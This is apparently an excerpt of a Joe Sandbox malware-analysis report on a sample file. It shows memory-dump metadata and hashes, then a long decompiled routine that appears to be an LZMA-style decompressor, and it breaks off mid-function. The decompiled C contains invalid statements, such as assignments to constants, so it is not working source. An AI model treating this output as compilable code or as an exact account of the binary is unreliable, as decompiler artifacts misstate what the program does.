                      0x00407524
                      0x00000000
                      0x00407399

                      Memory Dump Source
                      • Source File: 00000000.00000002.253377158.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.253370521.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253387347.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253394584.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253394584.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253394584.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253394584.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253394584.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253445143.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_fyTwP4SHWF.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 97748a737734167d5846b9d8dd4738ada3f75d0b833fdafa89234df63502b4a5
                      • Instruction ID: d49815ad38d406b3cd0a1a90ea7be1526168d9e39684835ffa6a026ef1ef4849
                      • Opcode Fuzzy Hash: 97748a737734167d5846b9d8dd4738ada3f75d0b833fdafa89234df63502b4a5
                      • Instruction Fuzzy Hash: 91913270D04228DBEF28CF98C8547ADBBB1FF44305F14816AD856BB281D778A986DF45
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 98%
                      			E004070AB() {
                      				unsigned short _t532;
                      				signed int _t533;
                      				void _t534;
                      				void* _t535;
                      				signed int _t536;
                      				signed int _t565;
                      				signed int _t568;
                      				signed int _t589;
                      				signed int* _t606;
                      				void* _t613;
                      
                      				L0:
                      				while(1) {
                      					L0:
                      					if( *(_t613 - 0x40) != 0) {
                      						L89:
                      						 *((intOrPtr*)(_t613 - 0x80)) = 0x15;
                      						 *(_t613 - 0x58) =  *(_t613 - 4) + 0xa68;
                      						L69:
                      						_t606 =  *(_t613 - 0x58);
                      						 *(_t613 - 0x84) = 0x12;
                      						L132:
                      						 *(_t613 - 0x54) = _t606;
                      						L133:
                      						_t532 =  *_t606;
                      						_t589 = _t532 & 0x0000ffff;
                      						_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
                      						if( *(_t613 - 0xc) >= _t565) {
                      							 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
                      							 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
                      							 *(_t613 - 0x40) = 1;
                      							_t533 = _t532 - (_t532 >> 5);
                      							 *_t606 = _t533;
                      						} else {
                      							 *(_t613 - 0x10) = _t565;
                      							 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
                      							 *_t606 = (0x800 - _t589 >> 5) + _t532;
                      						}
                      						if( *(_t613 - 0x10) >= 0x1000000) {
                      							L139:
                      							_t534 =  *(_t613 - 0x84);
                      							L140:
                      							 *(_t613 - 0x88) = _t534;
                      							goto L1;
                      						} else {
                      							L137:
                      							if( *(_t613 - 0x6c) == 0) {
                      								 *(_t613 - 0x88) = 5;
                      								goto L170;
                      							}
                      							 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
                      							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                      							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                      							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
                      							goto L139;
                      						}
                      					} else {
                      						if( *(__ebp - 0x60) == 0) {
                      							L171:
                      							_t536 = _t535 | 0xffffffff;
                      							L172:
                      							return _t536;
                      						}
                      						__eax = 0;
                      						_t258 =  *(__ebp - 0x38) - 7 >= 0;
                      						0 | _t258 = _t258 + _t258 + 9;
                      						 *(__ebp - 0x38) = _t258 + _t258 + 9;
                      						L75:
                      						if( *(__ebp - 0x64) == 0) {
                      							 *(__ebp - 0x88) = 0x1b;
                      							L170:
                      							_t568 = 0x22;
                      							memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
                      							_t536 = 0;
                      							goto L172;
                      						}
                      						__eax =  *(__ebp - 0x14);
                      						__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                      						if(__eax >=  *(__ebp - 0x74)) {
                      							__eax = __eax +  *(__ebp - 0x74);
                      						}
                      						__edx =  *(__ebp - 8);
                      						__cl =  *(__eax + __edx);
                      						__eax =  *(__ebp - 0x14);
                      						 *(__ebp - 0x5c) = __cl;
                      						 *(__eax + __edx) = __cl;
                      						__eax = __eax + 1;
                      						__edx = 0;
                      						_t274 = __eax %  *(__ebp - 0x74);
                      						__eax = __eax /  *(__ebp - 0x74);
                      						__edx = _t274;
                      						__eax =  *(__ebp - 0x68);
                      						 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                      						 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                      						_t283 = __ebp - 0x64;
                      						 *_t283 =  *(__ebp - 0x64) - 1;
                      						 *( *(__ebp - 0x68)) = __cl;
                      						L79:
                      						 *(__ebp - 0x14) = __edx;
                      						L80:
                      						 *(__ebp - 0x88) = 2;
                      					}
                      					L1:
                      					_t535 =  *(_t613 - 0x88);
                      					if(_t535 > 0x1c) {
                      						goto L171;
                      					}
                      					switch( *((intOrPtr*)(_t535 * 4 +  &M00407602))) {
                      						case 0:
                      							if( *(_t613 - 0x6c) == 0) {
                      								goto L170;
                      							}
                      							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                      							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                      							_t535 =  *( *(_t613 - 0x70));
                      							if(_t535 > 0xe1) {
                      								goto L171;
                      							}
                      							_t539 = _t535 & 0x000000ff;
                      							_push(0x2d);
                      							asm("cdq");
                      							_pop(_t570);
                      							_push(9);
                      							_pop(_t571);
                      							_t609 = _t539 / _t570;
                      							_t541 = _t539 % _t570 & 0x000000ff;
                      							asm("cdq");
                      							_t604 = _t541 % _t571 & 0x000000ff;
                      							 *(_t613 - 0x3c) = _t604;
                      							 *(_t613 - 0x1c) = (1 << _t609) - 1;
                      							 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t541 / _t571) - 1;
                      							_t612 = (0x300 << _t604 + _t609) + 0x736;
                      							if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
                      								L10:
                      								if(_t612 == 0) {
                      									L12:
                      									 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
                      									 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
                      									goto L15;
                      								} else {
                      									goto L11;
                      								}
                      								do {
                      									L11:
                      									_t612 = _t612 - 1;
                      									 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
                      								} while (_t612 != 0);
                      								goto L12;
                      							}
                      							if( *(_t613 - 4) != 0) {
                      								GlobalFree( *(_t613 - 4));
                      							}
                      							_t535 = GlobalAlloc(0x40, 0x600); // executed
                      							 *(_t613 - 4) = _t535;
                      							if(_t535 == 0) {
                      								goto L171;
                      							} else {
                      								 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
                      								goto L10;
                      							}
                      						case 1:
                      							L13:
                      							__eflags =  *(_t613 - 0x6c);
                      							if( *(_t613 - 0x6c) == 0) {
                      								 *(_t613 - 0x88) = 1;
                      								goto L170;
                      							}
                      							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                      							 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
                      							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                      							_t45 = _t613 - 0x48;
                      							 *_t45 =  *(_t613 - 0x48) + 1;
                      							__eflags =  *_t45;
                      							L15:
                      							if( *(_t613 - 0x48) < 4) {
                      								goto L13;
                      							}
                      							_t547 =  *(_t613 - 0x40);
                      							if(_t547 ==  *(_t613 - 0x74)) {
                      								L20:
                      								 *(_t613 - 0x48) = 5;
                      								 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
                      								goto L23;
                      							}
                      							 *(_t613 - 0x74) = _t547;
                      							if( *(_t613 - 8) != 0) {
                      								GlobalFree( *(_t613 - 8));
                      							}
                      							_t535 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
                      							 *(_t613 - 8) = _t535;
                      							if(_t535 == 0) {
                      								goto L171;
                      							} else {
                      								goto L20;
                      							}
                      						case 2:
                      							L24:
                      							_t554 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
                      							 *(_t613 - 0x84) = 6;
                      							 *(_t613 - 0x4c) = _t554;
                      							_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t554) * 2;
                      							goto L132;
                      						case 3:
                      							L21:
                      							__eflags =  *(_t613 - 0x6c);
                      							if( *(_t613 - 0x6c) == 0) {
                      								 *(_t613 - 0x88) = 3;
                      								goto L170;
                      							}
                      							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                      							_t67 = _t613 - 0x70;
                      							 *_t67 =  &(( *(_t613 - 0x70))[1]);
                      							__eflags =  *_t67;
                      							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
                      							L23:
                      							 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
                      							if( *(_t613 - 0x48) != 0) {
                      								goto L21;
                      							}
                      							goto L24;
                      						case 4:
                      							goto L133;
                      						case 5:
                      							goto L137;
                      						case 6:
                      							__edx = 0;
                      							__eflags =  *(__ebp - 0x40);
                      							if( *(__ebp - 0x40) != 0) {
                      								__eax =  *(__ebp - 4);
                      								__ecx =  *(__ebp - 0x38);
                      								 *(__ebp - 0x34) = 1;
                      								 *(__ebp - 0x84) = 7;
                      								__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
                      								goto L132;
                      							}
                      							__eax =  *(__ebp - 0x5c) & 0x000000ff;
                      							__esi =  *(__ebp - 0x60);
                      							__cl = 8;
                      							__cl = 8 -  *(__ebp - 0x3c);
                      							__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
                      							__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
                      							__ecx =  *(__ebp - 0x3c);
                      							__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
                      							__ecx =  *(__ebp - 4);
                      							(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
                      							__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
                      							__eflags =  *(__ebp - 0x38) - 4;
                      							__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                      							 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                      							if( *(__ebp - 0x38) >= 4) {
                      								__eflags =  *(__ebp - 0x38) - 0xa;
                      								if( *(__ebp - 0x38) >= 0xa) {
                      									_t98 = __ebp - 0x38;
                      									 *_t98 =  *(__ebp - 0x38) - 6;
                      									__eflags =  *_t98;
                      								} else {
                      									 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
                      								}
                      							} else {
                      								 *(__ebp - 0x38) = 0;
                      							}
                      							__eflags =  *(__ebp - 0x34) - __edx;
                      							if( *(__ebp - 0x34) == __edx) {
                      								__ebx = 0;
                      								__ebx = 1;
                      								goto L61;
                      							} else {
                      								__eax =  *(__ebp - 0x14);
                      								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                      								__eflags = __eax -  *(__ebp - 0x74);
                      								if(__eax >=  *(__ebp - 0x74)) {
                      									__eax = __eax +  *(__ebp - 0x74);
                      									__eflags = __eax;
                      								}
                      								__ecx =  *(__ebp - 8);
                      								__ebx = 0;
                      								__ebx = 1;
                      								__al =  *((intOrPtr*)(__eax + __ecx));
                      								 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
                      								goto L41;
                      							}
                      						case 7:
                      							__eflags =  *(__ebp - 0x40) - 1;
                      							if( *(__ebp - 0x40) != 1) {
                      								__eax =  *(__ebp - 0x24);
                      								 *(__ebp - 0x80) = 0x16;
                      								 *(__ebp - 0x20) =  *(__ebp - 0x24);
                      								__eax =  *(__ebp - 0x28);
                      								 *(__ebp - 0x24) =  *(__ebp - 0x28);
                      								__eax =  *(__ebp - 0x2c);
                      								 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                      								__eax = 0;
                      								__eflags =  *(__ebp - 0x38) - 7;
                      								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                      								__al = __al & 0x000000fd;
                      								__eax = (__eflags >= 0) - 1 + 0xa;
                      								 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
                      								__eax =  *(__ebp - 4);
                      								__eax =  *(__ebp - 4) + 0x664;
                      								__eflags = __eax;
                      								 *(__ebp - 0x58) = __eax;
                      								goto L69;
                      							}
                      							__eax =  *(__ebp - 4);
                      							__ecx =  *(__ebp - 0x38);
                      							 *(__ebp - 0x84) = 8;
                      							__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
                      							goto L132;
                      						case 8:
                      							__eflags =  *(__ebp - 0x40);
                      							if( *(__ebp - 0x40) != 0) {
                      								__eax =  *(__ebp - 4);
                      								__ecx =  *(__ebp - 0x38);
                      								 *(__ebp - 0x84) = 0xa;
                      								__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
                      							} else {
                      								__eax =  *(__ebp - 0x38);
                      								__ecx =  *(__ebp - 4);
                      								__eax =  *(__ebp - 0x38) + 0xf;
                      								 *(__ebp - 0x84) = 9;
                      								 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
                      								__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
                      							}
                      							goto L132;
                      						case 9:
                      							goto L0;
                      						case 0xa:
                      							__eflags =  *(__ebp - 0x40);
                      							if( *(__ebp - 0x40) != 0) {
                      								__eax =  *(__ebp - 4);
                      								__ecx =  *(__ebp - 0x38);
                      								 *(__ebp - 0x84) = 0xb;
                      								__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
                      								goto L132;
                      							}
                      							__eax =  *(__ebp - 0x28);
                      							goto L88;
                      						case 0xb:
                      							__eflags =  *(__ebp - 0x40);
                      							if( *(__ebp - 0x40) != 0) {
                      								__ecx =  *(__ebp - 0x24);
                      								__eax =  *(__ebp - 0x20);
                      								 *(__ebp - 0x20) =  *(__ebp - 0x24);
                      							} else {
                      								__eax =  *(__ebp - 0x24);
                      							}
                      							__ecx =  *(__ebp - 0x28);
                      							 *(__ebp - 0x24) =  *(__ebp - 0x28);
                      							L88:
                      							__ecx =  *(__ebp - 0x2c);
                      							 *(__ebp - 0x2c) = __eax;
                      							 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                      							goto L89;
                      						case 0xc:
                      							L99:
                      							__eflags =  *(__ebp - 0x6c);
                      							if( *(__ebp - 0x6c) == 0) {
                      								 *(__ebp - 0x88) = 0xc;
                      								goto L170;
                      							}
                      							__ecx =  *(__ebp - 0x70);
                      							__eax =  *(__ebp - 0xc);
                      							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                      							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                      							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                      							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                      							_t334 = __ebp - 0x70;
                      							 *_t334 =  *(__ebp - 0x70) + 1;
                      							__eflags =  *_t334;
                      							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                      							__eax =  *(__ebp - 0x2c);
                      							goto L101;
                      						case 0xd:
                      							L37:
                      							__eflags =  *(__ebp - 0x6c);
                      							if( *(__ebp - 0x6c) == 0) {
                      								 *(__ebp - 0x88) = 0xd;
                      								goto L170;
                      							}
                      							__ecx =  *(__ebp - 0x70);
                      							__eax =  *(__ebp - 0xc);
                      							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                      							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                      							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                      							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                      							_t122 = __ebp - 0x70;
                      							 *_t122 =  *(__ebp - 0x70) + 1;
                      							__eflags =  *_t122;
                      							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                      							L39:
                      							__eax =  *(__ebp - 0x40);
                      							__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                      							if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
                      								goto L48;
                      							}
                      							__eflags = __ebx - 0x100;
                      							if(__ebx >= 0x100) {
                      								goto L54;
                      							}
                      							L41:
                      							__eax =  *(__ebp - 0x5b) & 0x000000ff;
                      							 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
                      							__ecx =  *(__ebp - 0x58);
                      							__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
                      							 *(__ebp - 0x48) = __eax;
                      							__eax = __eax + 1;
                      							__eax = __eax << 8;
                      							__eax = __eax + __ebx;
                      							__esi =  *(__ebp - 0x58) + __eax * 2;
                      							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                      							__ax =  *__esi;
                      							 *(__ebp - 0x54) = __esi;
                      							__edx = __ax & 0x0000ffff;
                      							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
                      							__eflags =  *(__ebp - 0xc) - __ecx;
                      							if( *(__ebp - 0xc) >= __ecx) {
                      								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                      								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                      								__cx = __ax;
                      								 *(__ebp - 0x40) = 1;
                      								__cx = __ax >> 5;
                      								__eflags = __eax;
                      								__ebx = __ebx + __ebx + 1;
                      								 *__esi = __ax;
                      							} else {
                      								 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
                      								 *(__ebp - 0x10) = __ecx;
                      								0x800 = 0x800 - __edx;
                      								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
                      								__ebx = __ebx + __ebx;
                      								 *__esi = __cx;
                      							}
                      							__eflags =  *(__ebp - 0x10) - 0x1000000;
                      							 *(__ebp - 0x44) = __ebx;
                      							if( *(__ebp - 0x10) >= 0x1000000) {
                      								goto L39;
                      							} else {
                      								goto L37;
                      							}
                      						case 0xe:
                      							L46:
                      							__eflags =  *(__ebp - 0x6c);
                      							if( *(__ebp - 0x6c) == 0) {
                      								 *(__ebp - 0x88) = 0xe;
                      								goto L170;
                      							}
                      							__ecx =  *(__ebp - 0x70);
                      							__eax =  *(__ebp - 0xc);
                      							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                      							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                      							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                      							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                      							_t156 = __ebp - 0x70;
                      							 *_t156 =  *(__ebp - 0x70) + 1;
                      							__eflags =  *_t156;
                      							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                      							while(1) {
                      								L48:
                      								__eflags = __ebx - 0x100;
                      								if(__ebx >= 0x100) {
                      									break;
                      								}
                      								__eax =  *(__ebp - 0x58);
                      								__edx = __ebx + __ebx;
                      								__ecx =  *(__ebp - 0x10);
                      								__esi = __edx + __eax;
                      								__ecx =  *(__ebp - 0x10) >> 0xb;
                      								__ax =  *__esi;
                      								 *(__ebp - 0x54) = __esi;
                      								__edi = __ax & 0x0000ffff;
                      								__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                      								__eflags =  *(__ebp - 0xc) - __ecx;
                      								if( *(__ebp - 0xc) >= __ecx) {
                      									 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                      									 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                      									__cx = __ax;
                      									_t170 = __edx + 1; // 0x1
                      									__ebx = _t170;
                      									__cx = __ax >> 5;
                      									__eflags = __eax;
                      									 *__esi = __ax;
                      								} else {
                      									 *(__ebp - 0x10) = __ecx;
                      									0x800 = 0x800 - __edi;
                      									0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                      									__ebx = __ebx + __ebx;
                      									 *__esi = __cx;
                      								}
                      								__eflags =  *(__ebp - 0x10) - 0x1000000;
                      								 *(__ebp - 0x44) = __ebx;
                      								if( *(__ebp - 0x10) >= 0x1000000) {
                      									continue;
                      								} else {
                      									goto L46;
                      								}
                      							}
                      							L54:
                      							_t173 = __ebp - 0x34;
                      							 *_t173 =  *(__ebp - 0x34) & 0x00000000;
                      							__eflags =  *_t173;
                      							goto L55;
                      						case 0xf:
                      							L58:
                      							__eflags =  *(__ebp - 0x6c);
                      							if( *(__ebp - 0x6c) == 0) {
                      								 *(__ebp - 0x88) = 0xf;
                      								goto L170;
                      							}
                      							__ecx =  *(__ebp - 0x70);
                      							__eax =  *(__ebp - 0xc);
                      							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                      							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                      							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                      							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                      							_t203 = __ebp - 0x70;
                      							 *_t203 =  *(__ebp - 0x70) + 1;
                      							__eflags =  *_t203;
                      							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                      							L60:
                      							__eflags = __ebx - 0x100;
                      							if(__ebx >= 0x100) {
                      								L55:
                      								__al =  *(__ebp - 0x44);
                      								 *(__ebp - 0x5c) =  *(__ebp - 0x44);
                      								goto L56;
                      							}
                      							L61:
                      							__eax =  *(__ebp - 0x58);
                      							__edx = __ebx + __ebx;
                      							__ecx =  *(__ebp - 0x10);
                      							__esi = __edx + __eax;
                      							__ecx =  *(__ebp - 0x10) >> 0xb;
                      							__ax =  *__esi;
                      							 *(__ebp - 0x54) = __esi;
                      							__edi = __ax & 0x0000ffff;
                      							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                      							__eflags =  *(__ebp - 0xc) - __ecx;
                      							if( *(__ebp - 0xc) >= __ecx) {
                      								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                      								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                      								__cx = __ax;
                      								_t217 = __edx + 1; // 0x1
                      								__ebx = _t217;
                      								__cx = __ax >> 5;
                      								__eflags = __eax;
                      								 *__esi = __ax;
                      							} else {
                      								 *(__ebp - 0x10) = __ecx;
                      								0x800 = 0x800 - __edi;
                      								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                      								__ebx = __ebx + __ebx;
                      								 *__esi = __cx;
                      							}
                      							__eflags =  *(__ebp - 0x10) - 0x1000000;
                      							 *(__ebp - 0x44) = __ebx;
                      							if( *(__ebp - 0x10) >= 0x1000000) {
                      								goto L60;
                      							} else {
                      								goto L58;
                      							}
                      						case 0x10:
                      							L109:
                      							__eflags =  *(__ebp - 0x6c);
                      							if( *(__ebp - 0x6c) == 0) {
                      								 *(__ebp - 0x88) = 0x10;
                      								goto L170;
                      							}
                      							__ecx =  *(__ebp - 0x70);
                      							__eax =  *(__ebp - 0xc);
                      							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                      							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                      							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                      							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                      							_t365 = __ebp - 0x70;
                      							 *_t365 =  *(__ebp - 0x70) + 1;
                      							__eflags =  *_t365;
                      							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                      							goto L111;
                      						case 0x11:
                      							goto L69;
                      						case 0x12:
                      							__eflags =  *(__ebp - 0x40);
                      							if( *(__ebp - 0x40) != 0) {
                      								__eax =  *(__ebp - 0x58);
                      								 *(__ebp - 0x84) = 0x13;
                      								__esi =  *(__ebp - 0x58) + 2;
                      								goto L132;
                      							}
                      							__eax =  *(__ebp - 0x4c);
                      							 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
                      							__ecx =  *(__ebp - 0x58);
                      							__eax =  *(__ebp - 0x4c) << 4;
                      							__eflags = __eax;
                      							__eax =  *(__ebp - 0x58) + __eax + 4;
                      							goto L130;
                      						case 0x13:
                      							__eflags =  *(__ebp - 0x40);
                      							if( *(__ebp - 0x40) != 0) {
                      								_t469 = __ebp - 0x58;
                      								 *_t469 =  *(__ebp - 0x58) + 0x204;
                      								__eflags =  *_t469;
                      								 *(__ebp - 0x30) = 0x10;
                      								 *(__ebp - 0x40) = 8;
                      								L144:
                      								 *(__ebp - 0x7c) = 0x14;
                      								goto L145;
                      							}
                      							__eax =  *(__ebp - 0x4c);
                      							__ecx =  *(__ebp - 0x58);
                      							__eax =  *(__ebp - 0x4c) << 4;
                      							 *(__ebp - 0x30) = 8;
                      							__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
                      							L130:
                      							 *(__ebp - 0x58) = __eax;
                      							 *(__ebp - 0x40) = 3;
                      							goto L144;
                      						case 0x14:
                      							 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
                      							__eax =  *(__ebp - 0x80);
                      							goto L140;
                      						case 0x15:
                      							__eax = 0;
                      							__eflags =  *(__ebp - 0x38) - 7;
                      							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                      							__al = __al & 0x000000fd;
                      							__eax = (__eflags >= 0) - 1 + 0xb;
                      							 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
                      							goto L120;
                      						case 0x16:
                      							__eax =  *(__ebp - 0x30);
                      							__eflags = __eax - 4;
                      							if(__eax >= 4) {
                      								_push(3);
                      								_pop(__eax);
                      							}
                      							__ecx =  *(__ebp - 4);
                      							 *(__ebp - 0x40) = 6;
                      							__eax = __eax << 7;
                      							 *(__ebp - 0x7c) = 0x19;
                      							 *(__ebp - 0x58) = __eax;
                      							goto L145;
                      						case 0x17:
                      							L145:
                      							__eax =  *(__ebp - 0x40);
                      							 *(__ebp - 0x50) = 1;
                      							 *(__ebp - 0x48) =  *(__ebp - 0x40);
                      							goto L149;
                      						case 0x18:
                      							L146:
                      							__eflags =  *(__ebp - 0x6c);
                      							if( *(__ebp - 0x6c) == 0) {
                      								 *(__ebp - 0x88) = 0x18;
                      								goto L170;
                      							}
                      							__ecx =  *(__ebp - 0x70);
                      							__eax =  *(__ebp - 0xc);
                      							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                      							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                      							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                      							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                      							_t484 = __ebp - 0x70;
                      							 *_t484 =  *(__ebp - 0x70) + 1;
                      							__eflags =  *_t484;
                      							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                      							L148:
                      							_t487 = __ebp - 0x48;
                      							 *_t487 =  *(__ebp - 0x48) - 1;
                      							__eflags =  *_t487;
                      							L149:
                      							__eflags =  *(__ebp - 0x48);
                      							if( *(__ebp - 0x48) <= 0) {
